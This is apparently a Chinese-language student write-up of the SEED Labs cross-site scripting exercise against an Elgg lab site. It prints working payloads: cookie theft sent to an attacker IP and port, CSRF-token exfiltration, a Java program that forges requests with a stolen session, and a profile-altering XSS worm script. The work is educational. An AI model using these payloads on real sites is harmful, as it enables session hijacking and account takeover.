SeedLab:Web XSS

环境配置：

启动apache2服务：sudo service apache2 start
配置Apache服务，在/etc/apache2/sites-available/default中，配置如下：

实验内容：

Task 1:显示Alert窗口

在用户名boby下的修改信息这一网页中，在个人说明中插入alert信息：

1	<script>alert(‘XSS’);</script>

如下图所示:

登陆用户名bin，然后查看boby的信息，结果如下，会弹出一个窗口，结果如下：

将恶意内容放入js文件中，然后把链接指向js文件，具体指令如下：

attack.js文件的内容如下,将该文件放入xss.lagelgg.com的根目录下(/var/www/XSS/elgg/)

bin用户访问boby用户的信息时，攻击成功：

Task2:展示用户的cookie信息

在boby用户信息的编写框中输入如下攻击信息:

<script>alert(document.cookie);</script>

然后bin用户查看boby用户的信息时，出现如下弹框:

Task 3:

在boby用户信息的编写框中输入如下攻击信息(其中192.168.47.181为攻击中机器的ip地址):

<script>document.write('<img src =http://192.168.47.181:5555?c='+escape(document.cookie) + ' >');</script>

然后在攻击者机器中运行echoserv文件，让它监听5555端口，当bin用户查看boby的用户信息的时候，bin用户的cookie信息被发送到攻击者的机器上：

Task4:用偷来的Cookie来进行会话攻击

首先在boby的用户信息编写框中输入如下信息:

<script>document.write('<img src=http://127.0.0.1:5555?c='+escape(document.cookie)+'&'+elgg.security.token.__elgg_ts+'&'+elgg.security.token.__elgg_token+'  >');</script>

该js脚本的作用就是将访问boby用户信息的用户的cookie和elgg_ts,elgg_token信息发送到攻击者机器。

用LiveHttpHeaders工具来查看加好友的包的情况：

根据抓的包的信息来完成程序的构造：

import java.net.*;
import java.io.*;
public class HTTPSimpleForge {
       public static void main(String[] args) throws IOException {
       try {
             int responseCode;
             InputStream responseIn=null;
             // URL to be forged.
             URL url = new URL ("http://www.xsslabelgg.com/action/friends/add?friend=41&__elgg_ts=1464013312&__elgg_token=c2aa7157f41d7d265d4f082aa0b03b4f");
             URLConnection urlConn = url.openConnection();
             if (urlConn instanceof HttpURLConnection) {
                    urlConn.setConnectTimeout(60000);
                    urlConn.setReadTimeout(90000);
             }
     urlConn.addRequestProperty("Host","www.xsslabelgg.com");
     urlConn.addRequestProperty("User-Agent","Sun JDK 1.6");
     urlConn.setRequestProperty("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
     urlConn.setRequestProperty("Accept-Language","en-us,en;q=0.5");
     urlConn.setRequestProperty("Accept-Encoding","gzip,deflate");
     urlConn.setRequestProperty("Referer","http://www.xsslabelgg.com/profile/charlie");
     urlConn.setRequestProperty("Cookie","Elgg=rpmo7shdmq6b6kdg38o76oo3j5");
     urlConn.setRequestProperty("Connection","keep-alive");
             urlConn.setDoOutput(true);
             String data="username=charlie&seed=charlie@seed.com";
             OutputStreamWriter wr = new OutputStreamWriter(urlConn.getOutputStream());
             wr.write(data);
             wr.flush();
              // HttpURLConnection a subclass of URLConnection is returned by
              // url.openConnection() since the url is an http request.
              if (urlConn instanceof HttpURLConnection) {
                     HttpURLConnection httpConn = (HttpURLConnection) urlConn;
                     // Contacts the web server and gets the status code from
                     // HTTP Response message.
                     responseCode = httpConn.getResponseCode();
                     System.out.println("Response Code = " + responseCode);
                     // HTTP status code HTTP_OK means the response was
                     // received sucessfully.
                     if (responseCode == HttpURLConnection.HTTP_OK) {
                            // Get the input stream from url connection object.
                            responseIn = urlConn.getInputStream();
                            // Create an instance for BufferedReader
                            // to read the response line by line.
                            BufferedReader buf_inp = new BufferedReader(
                            new InputStreamReader(responseIn));
                            String inputLine;
                            while((inputLine = buf_inp.readLine())!=null) {
                                   System.out.println(inputLine);
                            }
                     }
              }
       } catch (MalformedURLException e) {
              e.printStackTrace();
       }
       }
}

更改攻击者机器的/etc/hosts文件,使其修改/etc/hosts文件：
将www.xsslabelgg.com的ip地址改为192.168.47.185（受害者机器的ip）

在受害者机器上登入samy用户,首先查看samy的好友情况，可知现在samy没有好友:

Samy查看boby的信息，其cookie信息，cookie和elgg_ts,elgg_token信息都发回了攻击者机器：

将编写的攻击程序的cookie，elgg_ts,elgg_token等信息填充好，编译程序Javac HTTPSimpleForge.java，然后运行java HTTPSimpleForge,收到html的返回信息：

可知结果为200，查看samy的好友信息如下：

可知攻击成功。

Task 5：写一个XSS蠕虫

首先登陆boby用户，修改用户信息，查看包的情况如下：

根据包的情况编写worm.js程序：


var nod = document.getElementsByClassName("elgg-border-plain elgg-transition");
var user = nod[0].attributes.getNamedItem("alt").nodeValue;
if(user != 'Boby')
{
var Ajax=null;
// Construct the header information for the HTTP request
Ajax=new XMLHttpRequest();
if(Ajax == null)
	alert("Ajax is null");
Ajax.open("POST","http://www.xsslabelgg.com/action/profile/edit",true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("User-Agent","AJAX 1.2");
Ajax.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
Ajax.setRequestHeader("Accept-Language","en-US,en;q=0.5");
Ajax.setRequestHeader("Accept-Encoding","gzip,deflate");
var node = document.getElementsByClassName("elgg-border-plain elgg-transition");
var username = node[0].attributes.getNamedItem("alt").nodeValue;
Ajax.setRequestHeader("Refer","http://www.xsslabelgg.com/profile/"+username+"/edit");
Ajax.setRequestHeader("Keep-Alive","300");
Ajax.setRequestHeader("Connection","keep-alive");
Ajax.setRequestHeader("Cookie",document.cookie);
Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
// Construct the content. The format of the content can be learned
// from LiveHTTPHeaders.
var content = "__elgg_token="+elgg.security.token.__elgg_token+"&__elgg_ts="+elgg.security.token.__elgg_ts+"&name="+username+"&description=I'm stupid&guid="+elgg.session.user.guid;
Ajax.setRequestHeader("Content-Length",content.length);
// Send the HTTP POST request.
Ajax.send(content);
}